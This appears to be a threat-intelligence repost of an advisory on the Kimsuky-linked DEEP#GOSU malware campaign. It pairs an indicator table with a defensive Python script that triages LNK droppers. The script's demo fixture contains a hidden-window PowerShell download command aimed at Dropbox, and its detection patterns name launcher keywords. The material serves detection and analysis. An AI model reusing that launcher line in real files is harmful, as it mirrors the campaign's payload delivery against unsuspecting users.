Analysis of New DEEP#GOSU Attack Campaign Likely Associated with North Korean Kimsuky Targeting Victims with Stealthy Malware

2024-03-18 Securonix

https://www.securonix.com/blog/securonix-threat-research-security-advisory-new-deepgosu-attack-campaign/

Securonix tracks DEEP#GOSU as a multi-stage campaign likely associated with the North Korean Kimsuky group and aimed at South Korean victims. The infection chain begins with a PDF-themed LNK file delivered inside a ZIP archive; when opened, the LNK extracts and displays an embedded Korean-language PDF lure while silently running PowerShell that authenticates to Dropbox, then downloads, decrypts and executes the next-stage payload. Later stages use PowerShell and VBScript stagers, load .NET code dynamically in memory, and pull further payloads such as r_enc.bin from Dropbox, giving the operators RAT functionality and ongoing monitoring of the host. Because command-and-control and payload delivery go through legitimate cloud services (Dropbox and Google Docs), the traffic blends into normal network activity, and the operators can update modules remotely.
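The first stage described above (a document-sized LNK that carries a PDF lure and a PowerShell launcher pointing at Dropbox) is something an analyst can triage from the file alone. The following is an added example, not code from the Securonix advisory: it validates the ShellLink header, looks for an embedded PDF, extracts printable strings in both raw ASCII and UTF-16LE (the encoding LNK command-line arguments are stored in), and matches them against launcher keywords and the domains in the IoC table below. The LNK bytes it builds are constructed for the demo, not a real sample; the "Reflection.Assembly" keyword and the 64 KB size threshold are assumptions, not values quoted by the advisory.

```python
"""Heuristic triage for PDF-themed LNK droppers such as the DEEP#GOSU first stage.

Added example, not code from the Securonix advisory. It tests an LNK for the
traits the advisory describes: a genuine shell-link header, an embedded PDF
lure, PowerShell launcher strings, and the cloud/C2 domains listed in the IoC
table. The LNK bytes produced by build_demo_lnk() are constructed for this
demo and are not a real sample.
"""
import re
import struct

LNK_HEADER_SIZE = 0x4C
# LinkCLSID 00021401-0000-0000-C000-000000000046, as stored on disk.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
PDF_MAGIC = b"%PDF-"
# Domains from the advisory's IoC table (the hashes are truncated there, so not used).
KNOWN_DOMAINS = ("content.dropboxapi.com", "gbionet.com", "regard.co.kr")
# Launcher strings a document-themed shortcut has no business containing.
# Reflection.Assembly is an assumption: the usual route for the in-memory
# .NET loading the advisory mentions, not a string the advisory quotes.
SUSPICIOUS_RE = re.compile(
    r"powershell|encodedcommand|Invoke-WebRequest|\biwr\b|Reflection\.Assembly|r_enc\.bin",
    re.IGNORECASE,
)
# Assumed threshold: a real shortcut is a few KB; one carrying a lure is far larger.
LARGE_LNK_BYTES = 64 * 1024


def is_lnk(data: bytes) -> bool:
    """True if data starts with a well-formed ShellLinkHeader."""
    if len(data) < LNK_HEADER_SIZE:
        return False
    header_size = struct.unpack_from("<I", data, 0)[0]
    return header_size == LNK_HEADER_SIZE and data[4:20] == LNK_CLSID


def extract_strings(data: bytes, min_len: int = 6) -> list[str]:
    """Printable ASCII runs, both as raw bytes and as UTF-16LE (LNK StringData
    such as COMMAND_LINE_ARGUMENTS is stored in UTF-16LE)."""
    pattern = r"[\x20-\x7e]{%d,}" % min_len
    found = [m.group().decode("ascii") for m in re.finditer(pattern.encode(), data)]
    for offset in (0, 1):  # UTF-16LE text may begin at an odd byte offset
        text = data[offset:].decode("utf-16-le", errors="ignore")
        found.extend(re.findall(pattern, text))
    return list(dict.fromkeys(found))  # de-duplicate, keep order


def triage_lnk(data: bytes) -> dict:
    """Score one LNK and return the evidence behind the verdict."""
    result = {
        "is_lnk": is_lnk(data),
        "embedded_pdf_offset": data.find(PDF_MAGIC),
        "suspicious_strings": [],
        "known_domains": [],
        "verdict": "not-lnk",
    }
    if not result["is_lnk"]:
        return result
    for s in extract_strings(data):
        if SUSPICIOUS_RE.search(s):
            result["suspicious_strings"].append(s)
        for domain in KNOWN_DOMAINS:
            if domain in s and domain not in result["known_domains"]:
                result["known_domains"].append(domain)
    score = 0
    score += 1 if result["embedded_pdf_offset"] != -1 else 0
    score += 1 if result["suspicious_strings"] else 0
    score += 2 if result["known_domains"] else 0
    score += 1 if len(data) > LARGE_LNK_BYTES else 0
    result["verdict"] = "malicious" if score >= 3 else "suspicious" if score else "clean"
    return result


def _lnk_header() -> bytes:
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID
    return header + b"\x00" * (LNK_HEADER_SIZE - len(header))


def build_demo_lnk() -> bytes:
    """Constructed lure-style LNK: PowerShell arguments in UTF-16LE, an
    embedded PDF, and padding to document size. Not a real sample."""
    args = 'powershell -w hidden -c "iwr https://content.dropboxapi.com/"'.encode("utf-16-le")
    lure = b"%PDF-1.7\n% constructed lure body\n%%EOF\n"
    return _lnk_header() + args + lure + b"\x00" * (70 * 1024)


def build_benign_lnk() -> bytes:
    """Constructed ordinary shortcut for comparison."""
    return _lnk_header() + "C:\\Windows\\System32\\notepad.exe".encode("utf-16-le")


if __name__ == "__main__":
    for name, blob in (("demo lure", build_demo_lnk()), ("benign", build_benign_lnk())):
        print(name, triage_lnk(blob))
```

Scanning UTF-16LE at both even and odd offsets matters in practice: the command-line arguments that launch PowerShell live in the LNK's StringData as UTF-16LE, so an ASCII-only strings pass misses exactly the evidence that distinguishes a lure from a normal shortcut. The domain match is weighted higher than the keyword match because the IoC table ties those domains to this campaign, whereas "powershell" in a shortcut is merely unusual.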

Indicators of Compromise

Type    Value                               First Seen   Last Seen
HASH    89cad9a57985cc0ab3b7403a943ad0a…    2024-03-18   2024-12-27
HASH    60666cacdd6806ed05771f32eaa719e…    2024-03-18   2024-12-27
HASH    b72caab78d164637fea0937d7a94fc4…    2024-03-18   2024-12-27
HASH    f262588c48d2902992ffd275d2be636…    2024-03-18   2024-12-27
HASH    69c917ea96db28dbd5b67073ca0aac2…    2024-03-18   2024-12-27
HASH    1b75f70c226c9ada8e79c3fdd987277…    2024-03-18   2024-12-27
HASH    1617587ccdf5b0344089559ecf8fe7d…    2024-03-18   2024-12-27
HASH    46a5d54c264152ce915792af31c7582…    2024-03-18   2024-12-27
DOMAIN  regard.co.kr                        2024-03-18   2024-04-17
DOMAIN  gbionet.com                         2024-01-30   2024-04-17
URL     https://content.dropboxapi.com/…    2024-03-18   2024-03-18
URL     https://content.dropboxapi.com/…    2024-03-18   2024-03-18
URL     http://gbionet.com/inc/basl/up1…    2024-03-18   2024-03-18
URL     https://content.dropboxapi.com/…    2024-03-18   2024-03-18
URL     https://content.dropboxapi.com/…    2024-03-18   2024-03-18
URL     https://content.dropboxapi.com/…    2024-03-18   2024-03-18

Related Reports

2024-07-19 • 50% Match
#Trend #Andariel #Kimsuky #MoonstoneSleet #Lazarus #T1082 #T1059.003 #T1090 #T1140 #T1005 #T1070.004 #T1041 #T1113 #T1555 #T1560 #T1071.001 #T1046 #T1112 #T1115 #T1083 #T1497 #T1056.001 #T1036 #T1027 #T1204.002 #T1566.002 #T1555.003 #T1071 #T1124 #T1222 #T1552 #T1057 #T1583.003 #T1518.001 #T1547.001 #T1053.005 #T1539 #T1608.005 #T1583.001 #T1059.001 #T1053 #T1552.001 #T1566 #T1059 #T1003 #T1497.001 #T1102.001 #T1574.002 #T1562.001 #T1490 #T1486 #T1129 #T1133 #T1571 #T1548 #T1190 #T1203 #T1564.001 #T1087 #T1562.004 #T1218.011 #T1070.006 #T1547 #T1068 #T1614 #T1573 #T1095 #T1562 #T1070 #T1047 #T1056 #T1176 #T1010 #T1033 #T1569.002 #T1543.003 #T1485 #T1012 #T1202 #T1087.002 #T1021.004 #T1222.001 #T1518 #T1564.003 #T1505.003 #T1069.002 #T1564 #T1595.002 #T1027.005 #T1070.001 #T1056.004 #T1584
Shares tags: Kimsuky, T1082, T1140
2024-09-12 • 49% Match
#Kimsuky #T1102.002 #T1082 #T1059.003 #T1567.002 #T1140 #T1005 #T1070.004 #T1587.001 #T1041 #T1608.001 #T1071.001 #T1112 #T1083 #T1056.001 #T1059.006 #T1204.001 #T1059.007 #T1036 #T1027 #T1204.002 #T1566.002 #T1555.003 #T1057 #T1059.005 #T1583.006 #T1518.001 #T1566.001 #T1547.001 #T1585.002 #T1053.005 #T1598.003 #T1583.001 #T1059.001 #T1036.005 #T1552.001 #T1585.001 #T1105 #T1219 #T1055 #T1553.002 #T1562.001 #T1027.002 #T1133 #T1190 #T1098 #T1016 #T1074.001 #T1588.002 #T1055.012 #T1587 #T1078.003 #T1071.002 #T1562.004 #T1550.002 #T1111 #T1071.003 #T1591 #T1003.001 #T1218.011 #T1593.002 #T1586.002 #T1588.005 #T1583.004 #T1036.004 #T1589.003 #T1594 #T1218.010 #T1557 #T1593.001 #T1218.005 #T1589.002 #T1584.001 #T1070.006 #T1021.001 #T1560.001 #T1176 #T1136.001 #T1543.003 #T1012 #T1534 #T1560.003 #T1007 #T1564.003 #T1114.003 #T1114.002 #T1564.002 #T1040 #T1546.001 #T1505.003
Shares tags: Kimsuky, T1082, T1567.002